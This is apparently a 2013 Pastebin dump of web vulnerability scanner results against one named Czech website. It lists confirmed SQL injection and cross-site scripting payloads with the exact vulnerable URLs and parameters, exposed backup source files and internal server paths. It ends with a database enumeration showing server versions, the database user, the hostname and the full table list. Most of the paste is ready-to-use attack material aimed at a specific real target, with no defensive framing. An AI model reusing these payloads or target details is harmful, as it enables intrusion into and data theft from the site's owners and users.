API tools faq
paste
Advertisement
sroub3k

press.prdel.cz

sroub3k
Apr 6th, 2013
579
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.82 KB | None | 0 0
raw download clone embed print report
  1. ?????????????????????????????????????????????????????????????????????????????????????
  2. ??????????????????????????????????????????????????????????????????????????????????????
  3. ????????????????????????????????????????????????????????????????????????????????????????
  4. ???????????++?????????????????=:=?????????????~????????????????????????????????????????
  5. ????????+=~:::~~?????????????+~:????????????+~~???????????????????????????????????????
  6. ????????+~::??~:=???????????+=::???????????+~:??????????????????????????????????????????
  7. ????????=~::?+~,????????????=~:???????????+~:???????????????????????+++????????????????
  8. ????????~::::=???+~=+=???+~~::=????++=:???~:+?????????+=~?????=~~~~~~~:==???????
  9. ????????~::,????+~::::~?+~::::????=:~::??+::?????????+~:???????+++=~::===+????????????
  10. ????????~::=????=:=????=~:+~::??+~~::~???=:~????????+~:?????????+~:=++===~????????
  11. ????????~::?????~:?????~:~~:::?=~::??????~:=??+=+??+~~???+=???+~~=++++==~~=?????
  12. ????????~::????=:=?????=:::~::?+::~=++~~?=::??~~:??+~~~::??++~~~:::~====~~~????
  13. ?????????+??????:???????????+::+??+????????=~??????????????+==+++++++==~~~~????????
  14. ??????????????????????????????????????????????????????????++++++++++==~~~~=?????????
  15. ????????????????????????????????????????????????????????++++++==++===~~~~:?????????
  16. ???????????????????????????????????????????????????????+++++===~===~~~~~:+????????
  17. ?????????????????????????????????????????????????????+++++===~~~~~~~~~~~+??????
  18. ????????????????????????????????????????????????????+++++===~~~+++~~::~??????????
  19. ?????????????????????????????????????????????????+++++====~~~~=?III+??????????????
  20. ???????????????????????????????????????????????+++++===~~~~~:~??I7777I?II????????
  21. ??????????????????????????????????????????????++++===~~~~~~:=??I7777777IIII?????
  22. ???????????????????????????????????????????????+====~~~~~:~?????III7I77IIIII?????
  23. ???????????????????????????????????????????????????+===+???????????III?II7III??????
  24. ???????????????????????????????????????????????????????????????????IIIIIII????????
  25. ?????????????????????????????????????????????????????????????????????????????+
  26.  
  27. ||| Boolean Based SQL Injection
  28.  
  29. Severity: Critical
  30. Confirmation: Confirmed
  31. URL: http://press.prdel.cz/data.php3?st=' OR 'ns'='ns
  32. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  33. Parameter Name: st
  34. Parameter Type: Querystring
  35. Attack Pattern: ' OR 'ns'='ns
  36.  
  37. Severity: Critical
  38. Confirmation: Confirmed
  39. URL: http://press.prdel.cz/audit-pridej.php3?id=-1 OR 17-7=10
  40. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  41. Parameter Name: id
  42. Parameter Type: Querystring
  43. Attack Pattern: -1 OR 17-7=10
  44.  
  45. Severity: Critical
  46. Confirmation: Confirmed
  47. URL: http://press.prdel.cz/data.php3?st=' OR 'ns'='ns&jmeno=3&prijmeni=3&jedna=3&dve=3&tri=3&autor=3
  48. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  49. Parameter Name: st
  50. Parameter Type: Querystring
  51. Attack Pattern: ' OR 'ns'='ns
  52.  
  53. ||| XSS (Cross-site Scripting)
  54.  
  55. Severity: Important
  56. Confirmation: Confirmed
  57. URL: http://press.prdel.cz/prew.php3?st=aaa
  58. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  59. Parameter Name: autor
  60. Parameter Type: Post
  61. Attack Pattern: '"--></style></script><script>alert(0x0008F3)</script>
  62.  
  63. Severity: Important
  64. Confirmation: Confirmed
  65. URL: http://press.prdel.cz/prew.php3?st=aaa
  66. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  67. Parameter Name: dve
  68. Parameter Type: Post
  69. Attack Pattern: '"--></style></script><script>alert(0x0008F7)</script>
  70.  
  71. Severity: Important
  72. Confirmation: Confirmed
  73. URL: http://press.prdel.cz/prew.php3?st=aaa
  74. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  75. Parameter Name: jedna
  76. Parameter Type: Post
  77. Attack Pattern: '"--></style></script><script>alert(0x0008FB)</script>
  78.  
  79. Severity: Important
  80. Confirmation: Confirmed
  81. URL: http://press.prdel.cz/prew.php3?st='"--></style></script><script>alert(0x0008FC)</script>
  82. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  83. Parameter Name: st
  84. Parameter Type: Querystring
  85. Attack Pattern: '"--></style></script><script>alert(0x0008FC)</script>
  86.  
  87. Severity: Important
  88. Confirmation: Confirmed
  89. URL: http://press.prdel.cz/prew.php3?st=aaa
  90. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  91. Parameter Name: jmeno
  92. Parameter Type: Post
  93. Attack Pattern: '"--></style></script><script>alert(0x0008FF)</script>
  94.  
  95. Severity: Important
  96. Confirmation: Confirmed
  97. URL: http://press.prdel.cz/prew.php3?st=aaa
  98. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  99. Parameter Name: prijmeni
  100. Parameter Type: Post
  101. Attack Pattern: '"--></style></script><script>alert(0x000901)</script>
  102.  
  103. Severity: Important
  104. Confirmation: Confirmed
  105. URL: http://press.prdel.cz/prew.php3?st=aaa
  106. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  107. Parameter Name: tri
  108. Parameter Type: Post
  109. Attack Pattern: '"--></style></script><script>alert(0x000903)</script>
  110.  
  111. Severity: Important
  112. Confirmation: Confirmed
  113. URL: http://press.prdel.cz/prew.php3?st='"--></style></script><script>alert(0x00090B)</script>
  114. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  115. Parameter Name: st
  116. Parameter Type: Querystring
  117. Attack Pattern: '"--></style></script><script>alert(0x00090B)</script>
  118.  
  119. Severity: Important
  120. Confirmation: Confirmed
  121. URL: http://press.prdel.cz/prew.php3?st=bush
  122. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  123. Parameter Name: jmeno
  124. Parameter Type: Post
  125. Attack Pattern: '"--></style></script><script>alert(0x00090C)</script>
  126.  
  127. Severity: Important
  128. Confirmation: Confirmed
  129. URL: http://press.prdel.cz/prew.php3?st=bush
  130. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  131. Parameter Name: prijmeni
  132. Parameter Type: Post
  133. Attack Pattern: '"--></style></script><script>alert(0x00090D)</script>
  134.  
  135. Severity: Important
  136. Confirmation : Confirmed
  137. URL : http://press.prdel.cz/prew.php3?st=bush
  138. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  139. Parameter Name: dve
  140. Parameter Type: Post
  141. Attack Pattern: '"--></style></script><script>alert(0x00090E)</script>
  142.  
  143. Severity: Important
  144. Confirmation: Confirmed
  145. URL: http://press.prdel.cz/prew.php3?st=bush
  146. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  147. Parameter Name: autor
  148. Parameter Type: Post
  149. Attack Pattern: '"--></style></script><script>alert(0x00090F)</script>
  150.  
  151. Severity: Important
  152. Confirmation: Confirmed
  153. URL: http://press.prdel.cz/prew.php3?st=bush
  154. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  155. Parameter Name: jedna
  156. Parameter Type: Post
  157. Attack Pattern: '"--></style></script><script>alert(0x000910)</script>
  158.  
  159. Severity: Important
  160. Confirmation: Confirmed
  161. URL: http://press.prdel.cz/index.php3?poz=20&bc=9'"--></style></script><script>alert(0x00097E)</script>
  162. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  163. Parameter Name: bc
  164. Parameter Type: Querystring
  165. Attack Pattern: 9'"--></style></script><script>alert(0x00097E)</script>
  166.  
  167. Severity: Important
  168. Confirmation: Confirmed
  169. Vulnerable URL : http://press.prdel.cz/data.php3?st=potrat&jmeno='"--></style></script><script>alert(0x0009A3)</script>&prijmeni=3&jedna=3&dve=3&tri=3&autor=3
  170. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  171. Parameter Name: jmeno
  172. Parameter Type: Querystring
  173. Attack Pattern: '"--></style></script><script>alert(0x0009A3)</script>
  174.  
  175. Severity: Important
  176. Confirmation: Confirmed
  177. URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni='"--></style></script><script>alert(0x0009A6)</script>&jedna=3&dve=3&tri=3&autor=3
  178. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  179. Parameter Name: prijmeni
  180. Parameter Type: Querystring
  181. Attack Pattern: '"--></style></script><script>alert(0x0009A6)</script>
  182.  
  183. Severity: Important
  184. Confirmation: Confirmed
  185. URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna='"--></style></script><script>alert(0x0009A8)</script>&dve=3&tri=3&autor=3
  186. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  187. Parameter Name: jedna
  188. Parameter Type: Querystring
  189. Attack Pattern: '"--></style></script><script>alert(0x0009A8)</script>
  190.  
  191. Severity: Important
  192. Confirmation: Confirmed
  193. URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna=3&dve='"--></style></script><script>alert(0x0009AA)</script>&tri=3&autor=3
  194. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  195. Parameter Name: dve
  196. Parameter Type: Querystring
  197. Attack Pattern: '"--></style></script><script>alert(0x0009AA)</script>
  198.  
  199. Severity: Important
  200. Confirmation : Confirmed
  201. URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna=3&dve=3&tri=3&autor='"--></style></script><script>alert(0x0009D0)</script>
  202. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  203. Parameter Name: autor
  204. Parameter Type: Querystring
  205. Attack Pattern: '"--></style></script><script>alert(0x0009D0)</script>
  206.  
  207. Severity: Important
  208. Confirmation: Confirmed
  209. URL: http://press.prdel.cz/audit-pridej.php3?chyba=1&prjmeno=warning&prvec=warning&prkomentar=warning&vec='"--></style></script><script>alert(0x000AB2)</script>&komentar=3
  210. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  211. Parameter Name: vec
  212. Parameter Type: Querystring
  213. Attack Pattern: '"--></style></script><script>alert(0x000AB2)</script>
  214.  
  215. Severity: Important
  216. Confirmation: Confirmed
  217. URL: http://press.prdel.cz/audit-pridej.php3?chyba=1&prjmeno=warning&prvec=warning&prkomentar=warning&vec=3&komentar='"--></style></script><script>alert(0x000AB3)</script>
  218. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  219. Parameter Name: komentar
  220. Parameter Type: Querystring
  221. Attack Pattern: '"--></style></script><script>alert(0x000AB3)</script>
  222.  
  223. ||| Backup Source Code Found
  224.  
  225. Severity: Important
  226. Confirmation: Confirmed
  227. Vulnerable URL : http://press.prdel.cz/data.php3~
  228. Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
  229.  
  230. Severity : Important
  231. Confirmation : Confirmed
  232. Vulnerable URL : http://press.prdel.cz/realizace.php3~
  233. Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
  234.  
  235. ||| [Possible] Internal Path Leakage (*nix)
  236.  
  237. Severity : Information
  238. Confirmation : Confirmed
  239. Vulnerable URL : http://press.prdel.cz/phpinfo.php
  240. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  241.  
  242. Identified Internal Path(s):
  243.  
  244. /usr/obj/usr/src/sys/GENERIC
  245. /usr/local/etc/php&#039;
  246. /usr/local&#039;
  247. /usr/local/man&#039;
  248. /usr/local/info/&#039;
  249. /usr/local/etc
  250. /usr/local/etc/php.ini
  251. /usr/local/etc/php
  252. /usr/local/etc/php/extensions.ini
  253. /var/log/php_errors.log
  254. /usr/local/lib/php/20090626
  255. /usr/local/share/pear
  256. /usr/sbin/sendmail&nbsp;-t&nbsp;-i&nbsp;
  257. /usr/sbin/sendmail
  258. /usr/home/costra/web/prdel.cz/press/phpinfo.php
  259. /usr/local/bin/php-cgi
  260. /usr/sbin:/usr/bin
  261. /usr/home/costra/web/prdel.cz/press
  262.  
  263. ||| report db
  264.  
  265. Target: http://press.prdel.cz/audit-pridej.php3?id=-1+OR+17-7%3d10
  266. Web Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2
  267. Powered-by: PHP/5.3.8
  268. DB Server: MySQL
  269. Resp. Time(avg): 5281 ms
  270. Current User: prdel_cz@localhost
  271. Sql Version: 5.5.17
  272. Current DB: prdel_cz
  273. System User: prdel_cz@localhost
  274. Host Name: fubar.sigpipe.cz
  275. Installation dir: /usr/local
  276. DB User: 'prdel_cz'@'localhost'
  277. Data Bases: information_schema, prdel_cz, test
  278.  
  279. db: prdel_cz
  280. Tables:
  281.  
  282. grossip
  283. pomozmegrossovi
  284. prd_ankety
  285. prd_ankety_odp
  286. prd_autent
  287. prd_clanecky
  288. prd_clanecky_anotace
  289. prd_clanky_souvis_id
  290. prd_hororskopy
  291. prd_kategorie
  292. prd_koment
  293. prd_odkazy
  294. prd_poezie
  295. prd_poezie_autori
  296. prd_posta
  297. prd_pratele
  298. prd_reg
  299. prd_rubriky
  300. prd_soutez
  301. prdsowclanky
  302. pressanketa
  303. pressclanky
  304. pressdata
  305. presskomentare
  306. pressmaily
  307. ras_koment
  308.  
  309. System FreeBSD fubar.sigpipe.cz 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:15:25 UTC 2012 root@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!